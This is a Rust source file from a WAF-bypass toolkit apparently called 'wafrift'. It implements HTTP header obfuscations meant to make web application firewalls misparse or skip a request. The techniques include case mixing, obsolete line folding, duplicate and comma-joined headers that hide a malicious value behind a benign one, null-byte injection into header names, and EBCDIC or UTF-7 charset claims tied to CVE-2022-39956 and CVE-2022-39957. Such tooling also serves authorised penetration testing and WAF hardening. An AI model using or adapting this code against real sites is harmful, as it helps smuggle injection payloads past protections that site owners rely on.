Skip to main content

wafrift_encoding/
header.rs

1//! HTTP header obfuscation for WAF bypass.
2//!
3//! WAFs inspect HTTP headers to detect malicious requests. This module
4//! applies transformations that are valid per HTTP RFCs but confuse
5//! WAF header parsers, causing them to misparse or skip inspection.
6//!
7//! # Techniques
8//!
9//! - **Case mixing** — `cOnTeNt-TyPe` instead of `Content-Type`
10//! - **Whitespace tricks** — tabs, spaces around colons and values
11//! - **Header folding** — obsolete but still parsed by many servers (RFC 7230 §3.2.4)
12//! - **Duplicate headers** — first vs. last wins disagreement
13//! - **Underscore substitution** — `Content_Type` accepted by some servers
14//! - **Null byte injection** — `Content-Type\x00` truncates header name
15//! - **`SPaced` header name** — `Content-Type ` trailing space before colon
16//! - **Header value wrapping** — Value spread across multiple continuation lines
17//! - **Comma-joined header values** — Multiple values in one header via comma
18
19use std::fmt;
20use wafrift_types::hash::{FNV_OFFSET_64, FNV_PRIME_64};
21
22/// A header transformation technique.
23#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, serde::Serialize, serde::Deserialize)]
24#[non_exhaustive]
25pub enum HeaderTechnique {
26    /// Random case mixing of header name.
27    CaseMixing,
28    /// Tab character instead of space after colon.
29    TabSeparator,
30    /// Extra whitespace around header value.
31    WhitespacePadding,
32    /// Obsolete header folding with continuation line (CRLF + whitespace).
33    LineFolding,
34    /// LF-only continuation line.
35    LfOnlyLineFolding,
36    /// Duplicate header with benign value first.
37    DuplicateHeader,
38    /// Underscore instead of hyphen in header name.
39    UnderscoreSubstitution,
40    /// Null byte injected into header name.
41    NullByteInjection,
42    /// Trailing space before colon in header name.
43    TrailingSpace,
44    /// Header value wrapped across multiple continuation lines.
45    MultiLineFolding,
46    /// LF-only multi-line folding.
47    LfOnlyMultiLineFolding,
48    /// Multiple values comma-joined in a single header.
49    CommaJoin,
50}
51
52impl fmt::Display for HeaderTechnique {
53    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
54        match self {
55            Self::CaseMixing => f.write_str("case-mixing"),
56            Self::TabSeparator => f.write_str("tab-separator"),
57            Self::WhitespacePadding => f.write_str("whitespace-padding"),
58            Self::LineFolding => f.write_str("line-folding"),
59            Self::LfOnlyLineFolding => f.write_str("lf-only-line-folding"),
60            Self::DuplicateHeader => f.write_str("duplicate-header"),
61            Self::UnderscoreSubstitution => f.write_str("underscore-substitution"),
62            Self::NullByteInjection => f.write_str("null-byte-injection"),
63            Self::TrailingSpace => f.write_str("trailing-space"),
64            Self::MultiLineFolding => f.write_str("multi-line-folding"),
65            Self::LfOnlyMultiLineFolding => f.write_str("lf-only-multi-line-folding"),
66            Self::CommaJoin => f.write_str("comma-join"),
67        }
68    }
69}
70
71/// Apply case mixing to a header name.
72///
73/// Produces `cOnTeNt-TyPe` style output. HTTP header names are defined
74/// as case-insensitive (RFC 7230 §3.2), so servers accept any casing,
75/// but some WAFs only match canonical `Content-Type`.
76#[must_use]
77pub fn case_mix(header_name: &str) -> String {
78    crate::encoding::keyword::alternating_case(header_name, false)
79}
80
81/// Strip CR (`\r`), LF (`\n`), and NUL (`\0`) from a header value so
82/// the mutator output cannot smuggle a fake header line. Pre-fix every
83/// public mutator embedded `value` verbatim — a caller passing a value
84/// containing `\r\nEvil-Header: pwn` produced response splitting /
85/// request smuggling on the wire. The transport layer assumed these
86/// helpers had already sanitised; the helpers assumed the transport
87/// layer would. Both wrong. Sanitising here closes the gap without an
88/// API break.
89fn sanitize_header_value(value: &str) -> String {
90    value
91        .chars()
92        .filter(|c| *c != '\r' && *c != '\n' && *c != '\0')
93        .collect()
94}
95
96/// Apply tab separator: `Header:\tvalue` instead of `Header: value`.
97#[must_use]
98pub fn tab_separator(header_name: &str, value: &str) -> String {
99    let value = sanitize_header_value(value);
100    format!("{header_name}:\t{value}")
101}
102
103/// Apply whitespace padding around the value.
104///
105/// F136: pad count is derived deterministically from `header_name + value`
106/// via FNV-1a, NOT `rand::random`. A non-deterministic encoder cannot be
107/// regression-pinned and makes a successful bypass impossible to reproduce
108/// (every other tamper in this crate is deterministic for exactly this
109/// reason — see `parameter_pollute`'s F114 fix). The output pad range
110/// (2–5 spaces) is unchanged.
111#[must_use]
112pub fn whitespace_pad(header_name: &str, value: &str) -> String {
113    let value = sanitize_header_value(value);
114    let mut h: u64 = FNV_OFFSET_64;
115    for b in header_name.bytes().chain(value.bytes()) {
116        h ^= u64::from(b);
117        h = h.wrapping_mul(FNV_PRIME_64);
118    }
119    let pad_count = (h as usize % 4) + 2; // 2–5 spaces, deterministic
120    let pad = " ".repeat(pad_count);
121    format!("{header_name}:{pad}{value}{pad}")
122}
123
124/// Apply obsolete line folding (RFC 7230 §3.2.4).
125///
126/// The header value is split across two lines with a continuation marker
127/// (CRLF followed by a space or tab). This is obsolete but many servers
128/// still accept it, while WAFs often do not reassemble folded headers.
129#[must_use]
130pub fn line_fold(header_name: &str, value: &str) -> String {
131    line_fold_with_ending(header_name, value, "\r\n")
132}
133
134/// Apply LF-only line folding.
135#[must_use]
136pub fn lf_only_line_fold(header_name: &str, value: &str) -> String {
137    line_fold_with_ending(header_name, value, "\n")
138}
139
140fn line_fold_with_ending(header_name: &str, value: &str, ending: &str) -> String {
141    let value = sanitize_header_value(value);
142    if value.len() < 4 {
143        return format!("{header_name}: {value}");
144    }
145    let mid = crate::floor_char_boundary(&value, value.len() / 2);
146    format!(
147        "{}: {}{ending}\t{}",
148        header_name,
149        &value[..mid],
150        &value[mid..]
151    )
152}
153
154/// Apply multi-line folding — value spread across 3+ continuation lines.
155///
156/// More aggressive than single fold — splits value into thirds.
157/// Many WAFs only handle one continuation line.
158#[must_use]
159pub fn multi_line_fold(header_name: &str, value: &str) -> String {
160    multi_line_fold_with_ending(header_name, value, "\r\n")
161}
162
163/// Apply LF-only multi-line folding.
164#[must_use]
165pub fn lf_only_multi_line_fold(header_name: &str, value: &str) -> String {
166    multi_line_fold_with_ending(header_name, value, "\n")
167}
168
169fn multi_line_fold_with_ending(header_name: &str, value: &str, ending: &str) -> String {
170    let value = sanitize_header_value(value);
171    if value.len() < 6 {
172        return format!("{header_name}: {value}");
173    }
174    let t1 = crate::floor_char_boundary(&value, value.len() / 3);
175    let t2 = crate::floor_char_boundary(&value, value.len() * 2 / 3);
176    format!(
177        "{}: {}{ending} {}{ending}\t{}",
178        header_name,
179        &value[..t1],
180        &value[t1..t2],
181        &value[t2..]
182    )
183}
184
185/// Generate a duplicate header pair: returns `(benign_line, real_line)`.
186///
187/// Some WAFs only inspect the first occurrence of a header, while many
188/// servers use the last. By placing a benign value first and the real
189/// value second, the WAF sees the benign header, the server sees the
190/// real one.
191#[must_use]
192pub fn duplicate_header(
193    header_name: &str,
194    real_value: &str,
195    benign_value: &str,
196) -> (String, String) {
197    let real = sanitize_header_value(real_value);
198    let benign = sanitize_header_value(benign_value);
199    (
200        format!("{header_name}: {benign}"),
201        format!("{header_name}: {real}"),
202    )
203}
204
205/// Replace hyphens with underscores in the header name.
206///
207/// Some web servers (notably PHP with `$_SERVER`, and CGI) normalise
208/// `Content_Type` → `Content-Type`. WAFs typically do not.
209#[must_use]
210pub fn underscore_substitute(header_name: &str) -> String {
211    header_name.replace('-', "_")
212}
213
214/// Inject a null byte into the header name at the midpoint.
215///
216/// Some C-based WAF implementations (modSecurity, native nginx modules)
217/// use null-terminated string operations internally. A null byte in the
218/// header name causes the WAF to see a truncated name (e.g., `Content`
219/// instead of `Content-Type\x00`), while the upstream server may parse
220/// the full name.
221#[must_use]
222pub fn null_byte_inject(header_name: &str) -> String {
223    if header_name.len() < 2 {
224        return header_name.to_string();
225    }
226    let mid = crate::floor_char_boundary(header_name, header_name.len() / 2);
227    format!("{}\x00{}", &header_name[..mid], &header_name[mid..])
228}
229
230/// Add a trailing space before the colon separator.
231///
232/// `Content-Type : value` — some parsers strip the space, making this
233/// equivalent. WAFs that expect `Name:` or `Name: ` without extra space
234/// in the header name field may fail to match.
235#[must_use]
236pub fn trailing_space(header_name: &str, value: &str) -> String {
237    let value = sanitize_header_value(value);
238    format!("{header_name} : {value}")
239}
240
241/// Comma-join multiple values into a single header.
242///
243/// Per RFC 7230 §3.2.6, a recipient may combine multiple header fields
244/// with the same name into one `field-value` separated by commas.
245/// `Header: benign, malicious` is semantically equivalent to two
246/// separate `Header: benign` and `Header: malicious` lines. WAFs that
247/// split on the first comma may only inspect `benign`.
248#[must_use]
249pub fn comma_join(header_name: &str, real_value: &str, benign_value: &str) -> String {
250    let real = sanitize_header_value(real_value);
251    let benign = sanitize_header_value(benign_value);
252    format!("{header_name}: {benign}, {real}")
253}
254
255/// Build a `Content-Type` header with an exotic charset claim.
256///
257/// CVE-2022-39956 (Content-Type/Content-Transfer-Encoding abuse) +
258/// CVE-2022-39957 (Accept-Charset bypass) — OWASP CRS pre-3.3.3 did
259/// not validate the charset field before running UTF-8 regex rules.
260/// Attacker claims `charset=ibm037` (EBCDIC) or `charset=utf-32`;
261/// WAF runs regex against bytes that aren't even ASCII-`SELECT`, so
262/// the rule misses. Backend re-decodes via its own charset
263/// negotiation and sees the original payload.
264///
265/// Still relevant for unpatched CRS deployments AND for WAFs
266/// (Cloudflare, AWS) that don't fully validate charset before
267/// scanning. Fixed in CRS 3.3.3 / 3.2.2 (Sept 2022).
268#[must_use]
269pub fn charset_confusion(media_type: &str, charset: &str) -> String {
270    // No sanitize_header_value here — the whole point is exotic
271    // charset claims; the WAF SHOULD accept the line per RFC.
272    format!("Content-Type: {media_type}; charset={charset}")
273}
274
275/// Canonical list of exotic charset claims for `charset_confusion`.
276/// Each is a real IANA charset that some backend will accept and a
277/// hand-rolled WAF regex won't decode.
278pub const EXOTIC_CHARSETS: &[&str] = &[
279    "ibm037", // EBCDIC — byte values disjoint from ASCII
280    "ibm500", // EBCDIC variant
281    "utf-32", // 4-byte-per-char — ASCII regex misses
282    "utf-32be",
283    "utf-16",
284    "utf-16be",
285    "utf-7",       // SELECT = +U0wAAA-
286    "shift_jis",   // Japanese — partial ASCII overlap
287    "gb18030",     // Chinese
288    "iso-2022-jp", // Stateful — toggle-byte before SELECT
289];
290
291/// Apply all header obfuscation techniques to a header name/value pair.
292///
293/// Returns a vector of `(technique, obfuscated_header_line)` pairs.
294/// For `DuplicateHeader`, the two lines are joined with CRLF.
295#[must_use]
296pub fn all_obfuscations(header_name: &str, value: &str) -> Vec<(HeaderTechnique, String)> {
297    let benign = "safe_value";
298    // Three entries below (CaseMixing, UnderscoreSubstitution,
299    // NullByteInjection) transform only the header NAME and interpolate
300    // the value inline, so they must sanitise it here the same way the
301    // helper-based entries do internally — otherwise a value containing
302    // `\r\n` smuggles a header line on the wire. This is the exact gap
303    // `sanitize_header_value` was added to close; these inline format!s
304    // were missed by that fix. (The helper-based entries below sanitise
305    // internally, so passing the raw `value` to them stays correct.)
306    let safe_value = sanitize_header_value(value);
307    vec![
308        (
309            HeaderTechnique::CaseMixing,
310            format!("{}: {}", case_mix(header_name), safe_value),
311        ),
312        (
313            HeaderTechnique::TabSeparator,
314            tab_separator(header_name, value),
315        ),
316        (
317            HeaderTechnique::WhitespacePadding,
318            whitespace_pad(header_name, value),
319        ),
320        (HeaderTechnique::LineFolding, line_fold(header_name, value)),
321        (
322            HeaderTechnique::LfOnlyLineFolding,
323            lf_only_line_fold(header_name, value),
324        ),
325        (HeaderTechnique::DuplicateHeader, {
326            let (a, b) = duplicate_header(header_name, value, benign);
327            format!("{a}\r\n{b}")
328        }),
329        (
330            HeaderTechnique::UnderscoreSubstitution,
331            format!("{}: {}", underscore_substitute(header_name), safe_value),
332        ),
333        (
334            HeaderTechnique::NullByteInjection,
335            format!("{}: {}", null_byte_inject(header_name), safe_value),
336        ),
337        (
338            HeaderTechnique::TrailingSpace,
339            trailing_space(header_name, value),
340        ),
341        (
342            HeaderTechnique::MultiLineFolding,
343            multi_line_fold(header_name, value),
344        ),
345        (
346            HeaderTechnique::LfOnlyMultiLineFolding,
347            lf_only_multi_line_fold(header_name, value),
348        ),
349        (
350            HeaderTechnique::CommaJoin,
351            comma_join(header_name, value, benign),
352        ),
353    ]
354}
355
356#[cfg(test)]
357#[path = "header_tests.rs"]
358mod tests;